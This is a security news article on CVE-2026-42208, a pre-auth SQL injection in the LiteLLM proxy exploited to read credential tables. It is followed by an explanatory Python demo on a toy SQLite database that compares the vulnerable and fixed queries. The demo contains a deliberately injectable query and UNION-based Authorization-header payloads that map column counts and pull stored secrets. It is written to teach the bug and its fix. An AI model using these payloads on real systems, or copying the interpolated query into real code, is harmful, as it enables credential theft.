A critical-severity vulnerability in the open source AI gateway LiteLLM was exploited days after public disclosure to access database tables containing sensitive information, Sysdig reports.
The security defect is described as an SQL injection via the proxy API key verification process and is tracked as CVE-2026-42208, with a CVSS score of 9.3.
In an April 20 advisory, LiteLLM's maintainers explained that a database query used during key verification did not pass the caller-supplied value as a separate parameter, instead including it directly in the query text.
This allowed an unauthenticated attacker to send a specially crafted Authorization header to any LLM API route and reach the query through the proxy's error-handling path.
"The call happens before authentication (auth) is established, so the injection is fully pre-auth: any HTTP client that can reach the proxy port is sufficient," Sysdig notes.
By exploiting the issue, an attacker could access the LiteLLM proxy's database to read and potentially modify data, allowing them to leak credentials stored in the database.
On April 24, the advisory was listed in the GitHub Advisory database, and the first attacks exploiting the flaw were observed 36 hours later, Sysdig says.
The cybersecurity firm observed the attackers specifically targeting three database tables containing sensitive information such as API keys, provider credentials, and the proxy's environment variable configuration.
"The operator already knew LiteLLM's Prisma-generated PostgreSQL identifier casing and ran a textbook column-count discovery sweep against each target table," Sysdig explains.
Despite the targeted nature of the attacks, no follow-up activity was observed, and the extracted keys and credentials have not been abused.
The observed attacks, the cybersecurity firm says, were carried out 21 minutes apart, likely by an automated tool that used the same payload but rotated the origin IP addresses.
"The novelty of this finding is the speed and precision of the schema-enumeration attempt, not a confirmed compromise," Sysdig notes.
LiteLLM version 1.83.7 resolves the vulnerability by ensuring that the caller-supplied value is always passed as a separate (bound) parameter. Users are advised to update to the patched release as soon as possible, or to disable error logs to mitigate the exploitation path until they can.
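To make the bug class concrete, the following is an added illustration written for this page; it is not LiteLLM's code and does not reproduce its Prisma schema. It puts the interpolated key-verification query the advisory describes next to the parameterized form the fix uses, and runs the kind of column-count discovery sweep Sysdig observed against both. It uses SQLite so it runs offline; the real proxy uses PostgreSQL, but the injection mechanics are the same. Table and column names (`verification_tokens`, `provider_keys`) and the sample rows are constructed for the example.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema (an assumption for this example, not LiteLLM's
    real schema): one table of virtual keys, one of upstream provider secrets."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE verification_tokens (token TEXT, user_id TEXT, spend REAL);
        INSERT INTO verification_tokens VALUES ('sk-valid-1', 'alice', 0.0);
        CREATE TABLE provider_keys (name TEXT, secret TEXT);
        INSERT INTO provider_keys VALUES ('openai', 'sk-secret-openai');
        """
    )
    return conn


def extract_bearer(authorization_header: str) -> str:
    """Strip the 'Bearer ' prefix; everything after it is attacker-controlled."""
    m = re.match(r"^Bearer\s+(.*)$", authorization_header, re.IGNORECASE | re.DOTALL)
    return m.group(1) if m else ""


def lookup_key_vulnerable(conn, authorization_header):
    """The bug class in the advisory: the caller-supplied value is spliced into
    the SQL text, so the attacker's string is parsed as part of the query."""
    token = extract_bearer(authorization_header)
    sql = f"SELECT token, user_id, spend FROM verification_tokens WHERE token = '{token}'"
    return conn.execute(sql).fetchall()


def lookup_key_fixed(conn, authorization_header):
    """The fix: the value travels as a bound parameter and is never parsed as SQL."""
    token = extract_bearer(authorization_header)
    sql = "SELECT token, user_id, spend FROM verification_tokens WHERE token = ?"
    return conn.execute(sql, (token,)).fetchall()


def column_count_sweep(conn, lookup, max_cols=8):
    """Textbook column-count discovery: append 'UNION SELECT NULL,...' with a
    growing column count. A mismatch raises a database error (the signal an
    error-handling path leaks back to the caller); the first count that
    returns rows is the width of the original SELECT. None means no injection."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        header = f"Bearer x' UNION SELECT {nulls}--"
        try:
            rows = lookup(conn, header)
        except sqlite3.OperationalError:
            continue  # wrong column count: database rejected the UNION
        if rows:
            return n
    return None


def leak_provider_keys(conn, lookup):
    """Once the width (3 here) is known, UNION the secrets table into the
    key lookup so its rows come back through the normal result path."""
    header = "Bearer x' UNION SELECT name, secret, 0 FROM provider_keys--"
    return [(row[0], row[1]) for row in lookup(conn, header)]


if __name__ == "__main__":
    db = build_db()
    print("legit key (fixed path):", lookup_key_fixed(db, "Bearer sk-valid-1"))
    print("column width, vulnerable:", column_count_sweep(db, lookup_key_vulnerable))
    print("column width, fixed:", column_count_sweep(db, lookup_key_fixed))
    print("leaked, vulnerable:", leak_provider_keys(db, lookup_key_vulnerable))
    print("leaked, fixed:", leak_provider_keys(db, lookup_key_fixed))
```

The sweep against the vulnerable lookup errors on one and two columns and succeeds at three, which is exactly the behaviour that lets an unauthenticated caller map a table's width from a single route; against the parameterized lookup every probe is treated as a literal token that matches nothing, so the sweep returns nothing and the UNION never runs. Disabling error logs, the interim mitigation the advisory suggests, removes the error signal the sweep relies on but leaves the query itself unchanged, which is why the upgrade is the real fix.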